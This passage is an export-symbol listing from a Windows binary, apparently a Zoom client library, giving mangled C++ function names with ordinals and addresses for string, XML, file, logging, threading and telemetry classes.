              ?AppendRelativePath@FilePath@Cmm@@QBE_NABV12@PAV12@@Z23710x45aca0
              ?AppendToString@StringPiece@Cmm@@QBEXPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z23720x459f80
              ?Assign@?$CStringT@D@Cmm@@QAEXABUtagVARIANT@@H@Z23730x405cd0
              ?Assign@?$CStringT@D@Cmm@@QAEXABV12@@Z23740x405d10
              ?Assign@?$CStringT@D@Cmm@@QAEXABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z23750x405d30
              ?Assign@?$CStringT@D@Cmm@@QAEXD@Z23760x405d70
              ?Assign@?$CStringT@D@Cmm@@QAEXPBD@Z23770x405d50
              ?Assign@?$CStringT@D@Cmm@@QAEXPBDI@Z23780x405d40
              ?Assign@?$CStringT@D@Cmm@@QAEXV?$CRangeT@PBD@2@@Z23790x405cf0
              ?Assign@?$CStringT@_W@Cmm@@QAEXABUtagVARIANT@@H@Z23800x403e70
              ?Assign@?$CStringT@_W@Cmm@@QAEXABV12@@Z23810x403eb0
              ?Assign@?$CStringT@_W@Cmm@@QAEXABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z23820x403ed0
              ?Assign@?$CStringT@_W@Cmm@@QAEXPB_W@Z23830x403ef0
              ?Assign@?$CStringT@_W@Cmm@@QAEXPB_WI@Z23840x403ee0
              ?Assign@?$CStringT@_W@Cmm@@QAEXV?$CRangeT@PB_W@2@@Z23850x403e90
              ?Assign@?$CStringT@_W@Cmm@@QAEX_W@Z23860x403f10
              ?Assign@CCmmArchiveVarivant@Cmm@@IAEXABV12@@Z23870x459920
              ?AssignOther@?$CStringT@D@Cmm@@QAEAAV12@ABV?$CStringT@_W@2@@Z23880x405c50
              ?AssignOther@?$CStringT@D@Cmm@@QAEAAV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z23890x405c80
              ?AssignOther@?$CStringT@D@Cmm@@QAEAAV12@PB_W@Z23900x405cb0
              ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$CStringT@D@2@@Z23910x403df0
              ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@ABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z23920x403e20
              ?AssignOther@?$CStringT@_W@Cmm@@QAEAAV12@PBD@Z23930x403e50
              ?Attach@CFile@Cmm@@QAEXPAX@Z23940x411490
              ?Attribute@XMLElement@tinyxml2@@QBEPBDPBD0@Z23950x461460
              ?BaseInitLoggingImpl_built_with_NDEBUG@logging@@YA_NPB_W0HHW4LoggingDestination@1@W4LogEncryptPolicy@1@W4LogFileSuffixPolicy@1@W4LogLockingState@1@K@Z23960x45dec0
              ?BaseInitLoggingImpl_built_with_NDEBUG@logging@@YA_NPB_WW4LoggingDestination@1@W4LogLockingState@1@W4OldFileDeletionState@1@W4LogEncryptPolicy@1@K@Z23970x45de00
              ?BaseName@FilePath@Cmm@@QBE?AV12@XZ23980x45aeb0
              ?BoolAttribute@XMLElement@tinyxml2@@QBE_NPBD_N@Z23990x461590
              ?BoolText@XMLElement@tinyxml2@@QBE_N_N@Z24000x461bd0
              ?BoolToString@Cmm@@YAXHAAV?$CStringT@D@1@@Z24010x414610
              ?BoolToString@Cmm@@YAXHAAV?$CStringT@_W@1@@Z24020x414630
              ?BoolValue@XMLAttribute@tinyxml2@@QBE_NXZ24030x454600
              ?ByteToString@CmmGUID@Cmm@@QAEHPAEIAAV?$CStringT@_W@2@H@Z24040x470c60
              ?CData@XMLText@tinyxml2@@QBE_NXZ24050x4544b0
              ?CStr@XMLPrinter@tinyxml2@@QBEPBDXZ24060x454e00
              ?CStrSize@XMLPrinter@tinyxml2@@QBEHXZ24070x454e10
              ?CheckEvent@CCmmPerfTelemetry@@CAXUPerfMetricsEvents_s@ZoomPTPAAP@@@Z24080x467fe0
              ?CleanLogsWithFilters@logging@@YAXPB_WABV?$vector@ULogFilterItem_s@logging@@V?$allocator@ULogFilterItem_s@logging@@@std@@@std@@ABULogFilterItem_s@1@@Z24090x46f3c0
              ?CleanUpData@CCmmPerfTelemetry@@CAXXZ24100x467c40
              ?Clear@CCmmArchiveVarivant@Cmm@@IAEXXZ24110x459be0
              ?Clear@XMLDocument@tinyxml2@@QAEXXZ24120x4623b0
              ?ClearAllDuplicatedPackage@CCmmArchiveServiceImp@Archive@Cmm@@QAEXXZ24130x455440
              ?ClearAllPackageDefines@CCmmArchiveService@Cmm@@SAXXZ24140x455ba0
              ?ClearAllPackageDefines@CCmmArchiveServiceImp@Archive@Cmm@@QAEXXZ24150x4554a0
              ?ClearBuffer@XMLPrinter@tinyxml2@@QAEX_N@Z24160x454e20
              ?ClearData@CCmmArchiveVarivant@Cmm@@IAEXXZ24170x459b90
              ?ClearError@XMLDocument@tinyxml2@@QAEXXZ24180x454b30
              ?Close@CFile@Cmm@@QAEXXZ24190x4117b0
              ?Close@Channel@ssb_ipc@@QAEXXZ24200x45cb40
              ?CloseElement@XMLPrinter@tinyxml2@@UAEX_N@Z24210x4631c0
              ?CloseLogFile@logging@@YAXXZ24220x45ea10
              ?ClosingType@XMLElement@tinyxml2@@QBE?AW4ElementClosingType@12@XZ24230x454af0
              ?CmmStringFromInt64@Cmm@@YA?AV?$CStringT@D@1@_J@Z24240x414650
              ?CollapseWhitespace@StrPair@tinyxml2@@AAEXXZ24250x45fba0
              ?CompactMode@XMLPrinter@tinyxml2@@MAE_NABVXMLElement@2@@Z24260x454e60
              ?Compare@?$CStringT@D@Cmm@@QBEHABV12@@Z24270x405b30
              ?Compare@?$CStringT@D@Cmm@@QBEHPBD@Z24280x405b50
              ?Compare@?$CStringT@_W@Cmm@@QBEHABV12@@Z24290x403cd0
              ?Compare@?$CStringT@_W@Cmm@@QBEHPB_W@Z24300x403cf0
              ?CompareEqualIgnoreCase@FilePath@Cmm@@SA_NABV?$CStringT@_W@2@0@Z24310x4113c0
              ?CompareIgnoreCase@FilePath@Cmm@@SAHABV?$CStringT@_W@2@0@Z24320x45b610
              ?CompareLessIgnoreCase@FilePath@Cmm@@SA_NABV?$CStringT@_W@2@0@Z24330x4113e0
              ?CompareNoCase@?$CStringT@D@Cmm@@QBEHABV12@@Z24340x405ab0
              ?CompareNoCase@?$CStringT@D@Cmm@@QBEHPBD@Z24350x405ad0
              ?CompareNoCase@?$CStringT@_W@Cmm@@QBEHABV12@@Z24360x403c50
              ?CompareNoCase@?$CStringT@_W@Cmm@@QBEHPB_W@Z24370x403c70
              ?Connect@Channel@ssb_ipc@@QAE_NXZ24380x45cac0
              ?ConvertUTF32ToUTF8@XMLUtil@tinyxml2@@SAXKPADPAH@Z24390x45fdc0
              ?CopyToString@StringPiece@Cmm@@QBEXPAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@Z24400x459f50
              ?Create@CRefThread@Cmm@@QAEXXZ24410x417420
              ?Create@CThread@Cmm@@QAEXPAVIThread@2@@Z24420x417260
              ?Create@PlatformThread@@SA_NIPAVDelegate@1@PAPAX@Z24430x45f0d0
              ?CreateAlways@CFile@Cmm@@QAEXABVFilePath@2@W4EAccess@12@@Z24440x411570
              ?CreateAlways@CFile@Cmm@@QAEXPB_WW4EAccess@12@@Z24450x411540
              ?CreateAttribute@XMLElement@tinyxml2@@AAEPAVXMLAttribute@2@XZ24460x461e40
              ?CreateBy@CThread@Cmm@@QAEXP6GKPAX@Z0@Z24470x417290
              ?CreateNew@CFile@Cmm@@QAEXABVFilePath@2@W4EAccess@12@@Z24480x411500
              ?CreateNew@CFile@Cmm@@QAEXPB_WW4EAccess@12@@Z24490x4114d0
              ?CreateNonJoinable@PlatformThread@@SA_NIPAVDelegate@1@@Z24500x45f0f0
              ?CurrentId@PlatformThread@@SAKXZ24510x45f0b0
              ?CurrentThreadId@logging@@YAHXZ24520x45f0b0
              ?Dec@CAtomicInt@Cmm@@QAEJXZ24530x417040
              ?DeepClone@XMLNode@tinyxml2@@QBEPAV12@PAVXMLDocument@2@@Z24540x460500
              ?DeepCopy@XMLDocument@tinyxml2@@QBEXPAV12@@Z24550x4623f0
              ?Delete@?$CStringT@D@Cmm@@QAEHII@Z24560x405390
              ?Delete@?$CStringT@_W@Cmm@@QAEHII@Z24570x403460
              ?DeleteAttribute@XMLElement@tinyxml2@@CAXPAVXMLAttribute@2@@Z24580x461e00
              ?DeleteAttribute@XMLElement@tinyxml2@@QAEXPBD@Z24590x461c90
              ?DeleteChild@XMLNode@tinyxml2@@QAEXPAV12@@Z24600x4605c0
              ?DeleteChildren@XMLNode@tinyxml2@@QAEXXZ24610x460550
              ?DeleteNode@XMLDocument@tinyxml2@@QAEXPAVXMLNode@2@@Z24620x462550
              ?DeleteNode@XMLNode@tinyxml2@@CAXPAV12@@Z24630x4609e0
              ?Depth@CCmmArchivePath@Cmm@@QBEIXZ24640x416e80
              ?Detach@CFile@Cmm@@QAEPAXXZ24650x4114a0
              ?Detach@CThread@Cmm@@QAEXXZ24660x417230
              ?DirName@FilePath@Cmm@@QBE?AV12@XZ24670x45ade0
              ?DoCSpan@?$CStringT@D@Cmm@@ABEIPBD0@Z24680x403530
              ?DoCSpan@?$CStringT@D@Cmm@@ABEIPB_W0@Z24690x403510
              ?DoCSpan@?$CStringT@_W@Cmm@@ABEIPBD0@Z24700x403530
              ?DoCSpan@?$CStringT@_W@Cmm@@ABEIPB_W0@Z24710x403510
              ?DoConsumeEvents@CCmmPerfTelemetry@@SAXXZ24720x467ac0
              ?DoSendEvents@CCmmPerfTelemetry@@SAXXZ24730x467980
              ?DoSpan@?$CStringT@D@Cmm@@ABEIPBD0@Z24740x403570
              ?DoSpan@?$CStringT@D@Cmm@@ABEIPB_W0@Z24750x403550
              ?DoSpan@?$CStringT@_W@Cmm@@ABEIPBD0@Z24760x403570
              ?DoSpan@?$CStringT@_W@Cmm@@ABEIPB_W0@Z24770x403550
              ?DoubleAttribute@XMLElement@tinyxml2@@QBENPBDN@Z24780x4615c0
              ?DoubleText@XMLElement@tinyxml2@@QBENN@Z24790x461bf0
              ?DoubleValue@XMLAttribute@tinyxml2@@QBENXZ24800x454620
              ?Dump@CCmmArchiveServiceImp@Archive@Cmm@@QAEXXZ24810x455500
              ?Duplicate@CCmmArchiveTreeNode@Archive@Cmm@@QAEPAV123@H@Z24820x458740
              ?DuplicateNode@CCmmArchiveTreeNode@Archive@Cmm@@UAEPAVICmmArchiveObject@3@PAV43@@Z24830x458a10
              ?DuplicateTree@CCmmArchivePackageTree@Archive@Cmm@@QAEPAV123@H@Z24840x454ff0
              ?Elapse@CClock@Cmm@@QBEJXZ24850x412040
              ?Empty@StrPair@tinyxml2@@QBE_NXZ24860x454110
              ?EnableHighResolutionTimer@Time@Cmm@@SAX_N@Z24870x451950
              ?EnablePerformanceMetrics@CCmmPerfTelemetry@@SAXHPAVIPerfTelemetryHelper@@@Z24880x467c00
              ?EndsWith@?$CStringT@D@Cmm@@QBE_NABV12@_N@Z24890x405990
              ?EndsWith@?$CStringT@_W@Cmm@@QBE_NABV12@_N@Z24900x403b30
              ?Error@XMLDocument@tinyxml2@@QBE_NXZ24910x454b40
              ?ErrorID@XMLDocument@tinyxml2@@QBE?AW4XMLError@2@XZ24920x454ae0
              ?ErrorIDToName@XMLDocument@tinyxml2@@SAPBDW4XMLError@2@@Z24930x4629a0
              ?ErrorLineNum@XMLDocument@tinyxml2@@QBEHXZ24940x454b50
              ?ErrorName@XMLDocument@tinyxml2@@QBEPBDXZ24950x4629f0
              ?ErrorStr@XMLDocument@tinyxml2@@QBEPBDXZ24960x4629b0
              ?Explode@Time@Cmm@@ABEX_NPAUExploded@12@@Z24970x451aa0
              ?Extension@FilePath@Cmm@@QBE?AV?$CStringT@_W@2@XZ24980x45af30
              ?FileExist@CFile@Cmm@@SAHABVFilePath@2@@Z24990x4118a0
              ?FileExist@CFile@Cmm@@SAHPB_W@Z25000x4118c0
              ?Find@?$CStringT@D@Cmm@@QBEPADDI@Z25010x405850
              ?Find@?$CStringT@D@Cmm@@QBEPADDW4type_nocase@12@I@Z25020x405830
              ?Find@?$CStringT@D@Cmm@@QBEPADDW4type_reverse@12@I@Z25030x405810
              ?Find@?$CStringT@D@Cmm@@QBEPADPBDI@Z25040x4058b0
              ?Find@?$CStringT@D@Cmm@@QBEPADPBDW4type_nocase@12@I@Z25050x405890
              ?Find@?$CStringT@D@Cmm@@QBEPADPBDW4type_reverse_nocase@12@I@Z25060x405870
              ?Find@?$CStringT@_W@Cmm@@QBEPA_WPB_WI@Z25070x403a20
              ?Find@?$CStringT@_W@Cmm@@QBEPA_WPB_WW4type_nocase@12@I@Z25080x403a00
              ?Find@?$CStringT@_W@Cmm@@QBEPA_WPB_WW4type_reverse_nocase@12@I@Z25090x4039e0
              ?Find@?$CStringT@_W@Cmm@@QBEPA_W_WI@Z25100x4039c0
              ?Find@?$CStringT@_W@Cmm@@QBEPA_W_WW4type_nocase@12@I@Z25110x4039a0
              ?Find@?$CStringT@_W@Cmm@@QBEPA_W_WW4type_reverse@12@I@Z25120x403980
              ?FindAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@PBD@Z25130x461420
              ?FindDuplicatedPackage@CCmmArchiveServiceImp@Archive@Cmm@@IAE?AV?$_Vector_iterator@V?$_Vector_val@U?$_Simple_types@PAVCCmmArchivePackageTree@Archive@Cmm@@@std@@@std@@@std@@PAVICmmArchiveObject@3@H@Z25140x4553e0
              ?FindDuplicatedPackageWithoutLock@CCmmArchiveServiceImp@Archive@Cmm@@IAE?AV?$_Vector_iterator@V?$_Vector_val@U?$_Simple_types@PAVCCmmArchivePackageTree@Archive@Cmm@@@std@@@std@@@std@@PAVICmmArchiveObject@3@@Z25150x455350
              ?FindOneOf@?$CStringT@D@Cmm@@QBEHPBDI@Z25160x405800
              ?FindOneOf@?$CStringT@_W@Cmm@@QBEHPB_WI@Z25170x403970
              ?FindOrCreateAttribute@XMLElement@tinyxml2@@AAEPAVXMLAttribute@2@PBD@Z25180x461c30
              ?FindPackageDefine@CCmmArchiveServiceImp@Archive@Cmm@@IAE?AV?$_Vector_iterator@V?$_Vector_val@U?$_Simple_types@PAVCCmmArchivePackageTree@Archive@Cmm@@@std@@@std@@@std@@ABV?$CStringT@_W@3@HH@Z25190x455390
              ?FindPackageDefineWithoutLock@CCmmArchiveServiceImp@Archive@Cmm@@IAE?AV?$_Vector_iterator@V?$_Vector_val@U?$_Simple_types@PAVCCmmArchivePackageTree@Archive@Cmm@@@std@@@std@@@std@@ABV?$CStringT@_W@3@H@Z25200x455300
              ?FirstAttribute@XMLElement@tinyxml2@@QBEPBVXMLAttribute@2@XZ25210x454ae0
              ?FirstChild@XMLConstHandle@tinyxml2@@QBE?BV12@XZ25220x454b90
              ?FirstChild@XMLHandle@tinyxml2@@QAE?AV12@XZ25230x454b90
              ?FirstChild@XMLHandle@tinyxml2@@QBE?AV12@PBD@Z25240x454bb0
              ?FirstChild@XMLNode@tinyxml2@@QAEPAV12@PBD@Z25250x4543b0
              ?FirstChild@XMLNode@tinyxml2@@QAEPAV12@XZ25260x454360
              ?FirstChild@XMLNode@tinyxml2@@QBEPBV12@PBD@Z25270x454370
              ?FirstChild@XMLNode@tinyxml2@@QBEPBV12@XZ25280x454360
              ?FirstChildElement@XMLConstHandle@tinyxml2@@QBE?BV12@PBD@Z25290x454be0
              ?FirstChildElement@XMLHandle@tinyxml2@@QAE?AV12@PBD@Z25300x454be0
              ?FirstChildElement@XMLNode@tinyxml2@@QAEPAVXMLElement@2@PBD@Z25310x4543c0
              ?FirstChildElement@XMLNode@tinyxml2@@QBEPBVXMLElement@2@PBD@Z25320x4606e0
              ?Flattern@CCmmArchiveObjHelper@Cmm@@QAEPAVICmmArchiveStream@2@XZ25330x452ad0
              ?Flattern@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVICmmArchiveStream@3@W4StreamType@43@@Z25340x455040
              ?Flattern@CCmmArchiveService@Cmm@@SAPAVICmmArchiveStream@2@PAVICmmArchiveObject@2@W4StreamType@32@@Z25350x455e20
              ?Flattern@CCmmArchiveServiceImp@Archive@Cmm@@QAEPAVICmmArchiveStream@3@PAVICmmArchiveObject@3@W4StreamType@43@@Z25360x455660
              ?FlatternToMsg@CCmmMessageHelper@Cmm@@YAPAVCmmMQ_Msg@2@PAVCCmmArchiveObjHelper@2@H@Z25370x454000
              ?FloatAttribute@XMLElement@tinyxml2@@QBEMPBDM@Z25380x4615f0
              ?FloatText@XMLElement@tinyxml2@@QBEMM@Z25390x461c10
              ?FloatValue@XMLAttribute@tinyxml2@@QBEMXZ25400x454640
              ?Flush@CFile@Cmm@@QAEXXZ25410x4117a0
              ?Format@?$CStringT@D@Cmm@@QAAXPBDZZ25420x405c10
              ?Format@?$CStringT@_W@Cmm@@QAAXPB_WZZ25430x403db0
              ?Format@CTime@Cmm@@QAEIPADIPBD@Z25440x411f80
              ?Format@CTime@Cmm@@QAEIPA_WIPB_W@Z25450x40e150
              ?FormatGmt@CTime@Cmm@@QAEIPADIPBD@Z25460x411fb0
              ?FormatGmt@CTime@Cmm@@QAEIPA_WIPB_W@Z25470x411fe0
              ?FormatMessageW@?$CStringT@D@Cmm@@QAAIPBDZZ25480x405bc0
              ?FormatMessageW@?$CStringT@_W@Cmm@@QAAIPB_WZZ25490x403d60
              ?FormatV@?$CStringT@D@Cmm@@QAEXPBDPAD@Z25500x405c30
              ?FormatV@?$CStringT@_W@Cmm@@QAEXPB_WPAD@Z25510x403dd0
              ?FreeArchiveObject@CCmmArchiveService@Cmm@@SAXPAVICmmArchiveObject@2@@Z25520x455de0
              ?FreeDuplicatedObj@CCmmArchiveServiceImp@Archive@Cmm@@QAEXPAVICmmArchiveObject@3@@Z25530x455520
              ?FreeMsg@CCmmMessageHelper@Cmm@@YAXPAVCmmMQ_Msg@2@@Z25540x453f80
              ?FreeSlot@ThreadLocalPlatform@internal@Cmm@@SAXAAK@Z25550x45f230
              ?FromDays@TimeDelta@Cmm@@SA?AV12@_J@Z25560x4122a0
              ?FromDoubleT@Time@Cmm@@SA?AV12@N@Z25570x451410
              ?FromExploded@Time@Cmm@@CA?AV12@_NABUExploded@12@@Z25580x4519e0
              ?FromFileTime@Time@Cmm@@SA?AV12@U_FILETIME@@@Z25590x451900
              ?FromHours@TimeDelta@Cmm@@SA?AV12@_J@Z25600x40e1f0
              ?FromInternalValue@Time@Cmm@@SA?AV12@_J@Z25610x412260
              ?FromLocalExploded@Time@Cmm@@SA?AV12@ABUExploded@12@@Z25620x40e190
              ?FromMicroseconds@TimeDelta@Cmm@@SA?AV12@_J@Z25630x412260
              ?FromMilliseconds@TimeDelta@Cmm@@SA?AV12@_J@Z25640x412330
              ?FromMinutes@TimeDelta@Cmm@@SA?AV12@_J@Z25650x4122d0
              ?FromSeconds@TimeDelta@Cmm@@SA?AV12@_J@Z25660x412300
              ?FromString@Time@Cmm@@SA_NPB_WPAV12@@Z25670x4154c0
              ?FromStringT@Time@Cmm@@SA?AV12@ABV?$CStringT@_W@2@@Z25680x451500
              ?FromTimeT@Time@Cmm@@SA?AV12@_J@Z25690x451320
              ?FromTimeTInMS@Time@Cmm@@SA?AV12@_J@Z25700x451390
              ?FromUTCExploded@Time@Cmm@@SA?AV12@ABUExploded@12@@Z25710x412240
              ?FromWStringHack@FilePath@Cmm@@SA?AV12@ABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@@Z25720x45b6a0
              ?GenChannelName@CIPCChannelThread@ssb_ipc@@SAXABV?$CStringT@_W@Cmm@@IAAV34@@Z25730x4282a0
              ?Get@CAtomicInt@Cmm@@QBEJXZ25740x40c630
              ?GetAppPubCertPath@CFileName@Cmm@@QAEXXZ25750x412630
              ?GetAsFileTime@CTime@Cmm@@QBEXAAU_FILETIME@@@Z25760x411f50
              ?GetAsLocalTime@CTime@Cmm@@QBEXAAU_SYSTEMTIME@@@Z25770x411ef0
              ?GetAsSystemTime@CTime@Cmm@@QBEXAAU_SYSTEMTIME@@@Z25780x411e90
              ?GetAt@?$CStringT@D@Cmm@@QBEDI@Z25790x405970
              ?GetAt@?$CStringT@_W@Cmm@@QBE_WI@Z25800x403b10
              ?GetBase@CmmInternelMsg@Cmm@@QBEPBEXZ25810x40c640
              ?GetBody@CFileName@Cmm@@QBE?AV?$CFnRangeT@_W@2@XZ25820x4124b0
              ?GetBool@CCmmArchiveVarivant@Cmm@@QBEHXZ25830x459960
              ?GetBuffer@?$CStringT@D@Cmm@@QAEPADI@Z25840x405dd0
              ?GetBuffer@?$CStringT@D@Cmm@@QAEPADXZ25850x405e00
              ?GetBuffer@?$CStringT@_W@Cmm@@QAEPA_WI@Z25860x403f70
              ?GetBuffer@?$CStringT@_W@Cmm@@QAEPA_WXZ25870x403fa0
              ?GetBuffer@BinaryValue@@QAEPADXZ25880x416e70
              ?GetBuffer@BinaryValue@@QBEPBDXZ25890x416e70
              ?GetBufferSetLength@?$CStringT@D@Cmm@@QAEPADI@Z25900x405dc0
              ?GetBufferSetLength@?$CStringT@_W@Cmm@@QAEPA_WI@Z25910x403f60
              ?GetByte@CmmGUID@Cmm@@QAEHPAEAAI@Z25920x470c00
              ?GetCData@?$CStringT@D@Cmm@@QBEABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ25930x4043c0
              ?GetCData@?$CStringT@_W@Cmm@@QBEABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ25940x4043c0
              ?GetChar@CCmmArchiveVarivant@Cmm@@QBEDXZ25950x459970
              ?GetCharacterRef@XMLUtil@tinyxml2@@SAPBDPBDPADPAH@Z25960x45fe90
              ?GetComponents@FilePath@Cmm@@QBEXPAV?$vector@V?$CStringT@_W@Cmm@@V?$allocator@V?$CStringT@_W@Cmm@@@std@@@std@@@Z25970x45a8d0
              ?GetCountAttr@CCmmArchiveTreeNode@Archive@Cmm@@QAEHXZ25980x454af0
              ?GetCurrentDirectoryW@CFileName@Cmm@@QAEXXZ25990x412510
              ?GetCurrentGmtTime@CTime@Cmm@@SA?AV12@XZ26000x402280
              ?GetCurrentTimeZone@Cmm@@YA?AV?$CStringT@_W@1@XZ26010x450be0
              ?GetCurrentTimeZoneOfZOOM@Cmm@@YA?AV?$CStringT@_W@1@XZ26020x450c30
              ?GetCurrentTimeZone_DisplayName@Cmm@@YA?AV?$CStringT@_W@1@H@Z26030x450ca0
              ?GetCurrentTimeZone_DisplayName@Cmm@@YA?AV?$CStringT@_W@1@XZ26040x450c80
              ?GetData@?$CStringT@D@Cmm@@QAEAAV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@XZ26050x4043c0
              ?GetData@?$CStringT@_W@Cmm@@QAEAAV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ26060x4043c0
              ?GetData@CCmmArchiveTreeNode@Archive@Cmm@@QAEAAVCCmmArchiveVarivant@3@XZ26070x40c930
              ?GetData@CmmInternelMsg@Cmm@@UBEPBEXZ26080x45f570
              ?GetDataType@CCmmArchiveVarivant@Cmm@@QBE?AW4ArchDataType@12@XZ26090x416e70
              ?GetDay@CTime@Cmm@@QBEHXZ26100x402300
              ?GetDayOfWeek@CTime@Cmm@@QBEHXZ26110x40e130
              ?GetDays@CSeconds@Cmm@@QBE_JXZ26120x411980
              ?GetDocument@XMLNode@tinyxml2@@QAEPAVXMLDocument@2@XZ26130x40c640
              ?GetDocument@XMLNode@tinyxml2@@QBEPBVXMLDocument@2@XZ26140x40c640
              ?GetDouble@CCmmArchiveVarivant@Cmm@@QBENXZ26150x459990
              ?GetExt@CFileName@Cmm@@QBEPB_WH@Z26160x4123e0
              ?GetFirstChild@CCmmArchiveTreeNode@Archive@Cmm@@UAEPAVICmmArchiveObject@3@ABV?$CStringT@_W@3@@Z26170x458b10
              ?GetFloat@CCmmArchiveVarivant@Cmm@@QBEMXZ26180x459980
              ?GetFullPathNameW@CFileName@Cmm@@QAEXPB_W@Z26190x4125a0
              ?GetGmtTm@CTime@Cmm@@QBEXAAUtm@@@Z26200x411dd0
              ?GetHeadLen@CmmInternelMsg@Cmm@@SAIXZ26210x45f580
              ?GetHeartbeatThreshold@CCmmPerfTelemetry@@SAKXZ26220x4564c0
              ?GetHour@CTime@Cmm@@QBEHXZ26230x402310
              ?GetHourOfDay@CSeconds@Cmm@@QBE_JXZ26240x4119c0
              ?GetHours@CSeconds@Cmm@@QBE_JXZ26250x4119a0
              ?GetImp@CCmmArchiveServiceImp@Archive@Cmm@@SAAAV123@XZ26260x4569a0
              ?GetInt32@CCmmArchiveVarivant@Cmm@@QBEHXZ26270x459960
              ?GetInt64@CCmmArchiveVarivant@Cmm@@QBE_JXZ26280x4599a0
              ?GetItem10@?$CmmMessageTemplate_10@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26290x41a0b0
              ?GetItem10@?$CmmMessageTemplate_10@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@HH@Archive@Cmm@@QAEAAHXZ26300x41bea0
              ?GetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IHIHV12@H_KHH@Archive@Cmm@@QAEAAHXZ26310x418190
              ?GetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHH@Archive@Cmm@@QAEAAHXZ26320x41a080
              ?GetItem10@?$CmmMessageTemplate_10@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26330x425ac0
              ?GetItem11@?$CmmMessageTemplate_11@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26340x41a0e0
              ?GetItem11@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI@Archive@Cmm@@QAEAAIXZ26350x419c00
              ?GetItem11@?$CmmMessageTemplate_11@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHH@Archive@Cmm@@QAEAAHXZ26360x420a80
              ?GetItem12@?$CmmMessageTemplate_12@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26370x41a110
              ?GetItem12@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_K@Archive@Cmm@@QAEAA_KXZ26380x419c30
              ?GetItem12@?$CmmMessageTemplate_12@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHHHHH@Archive@Cmm@@QAEAAHXZ26390x4262e0
              ?GetItem13@?$CmmMessageTemplate_13@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26400x41a140
              ?GetItem13@?$CmmMessageTemplate_13@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KH@Archive@Cmm@@QAEAAHXZ26410x419c60
              ?GetItem14@?$CmmMessageTemplate_14@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26420x41a170
              ?GetItem14@?$CmmMessageTemplate_14@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHI@Archive@Cmm@@QAEAAIXZ26430x419c90
              ?GetItem15@?$CmmMessageTemplate_15@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@V32@V32@V12@V12@V12@V32@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26440x41a1a0
              ?GetItem15@?$CmmMessageTemplate_15@V?$CStringT@_W@Cmm@@IHIHV12@H_KHHI_KHII@Archive@Cmm@@QAEAAIXZ26450x419cc0
              ?GetItem1@?$CmmMessageTemplate_1@H@Archive@Cmm@@QAEAAHXZ26460x40c930
              ?GetItem1@?$CmmMessageTemplate_1@I@Archive@Cmm@@QAEAAIXZ26470x40c930
              ?GetItem1@?$CmmMessageTemplate_1@V?$CStringT@D@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26480x40c930
              ?GetItem1@?$CmmMessageTemplate_1@V?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26490x40c930
              ?GetItem1@?$CmmMessageTemplate_1@_J@Archive@Cmm@@QAEAA_JXZ26500x40c930
              ?GetItem2@?$CmmMessageTemplate_2@HH@Archive@Cmm@@QAEAAHXZ26510x417c00
              ?GetItem2@?$CmmMessageTemplate_2@HI@Archive@Cmm@@QAEAAIXZ26520x417c00
              ?GetItem2@?$CmmMessageTemplate_2@HV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26530x417c00
              ?GetItem2@?$CmmMessageTemplate_2@HV?$CStringT@_W@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ26540x417c00
              ?GetItem2@?$CmmMessageTemplate_2@H_J@Archive@Cmm@@QAEAA_JXZ26550x418930
              ?GetItem2@?$CmmMessageTemplate_2@IH@Archive@Cmm@@QAEAAHXZ26560x417c00
              ?GetItem2@?$CmmMessageTemplate_2@II@Archive@Cmm@@QAEAAIXZ26570x417c00
              ?GetItem2@?$CmmMessageTemplate_2@IV?$CStringT@D@Cmm@@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ26580x417c00
